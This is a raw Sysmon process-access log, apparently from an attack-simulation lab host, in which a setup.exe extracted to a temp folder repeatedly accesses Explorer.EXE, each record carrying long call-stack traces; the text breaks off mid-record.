13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+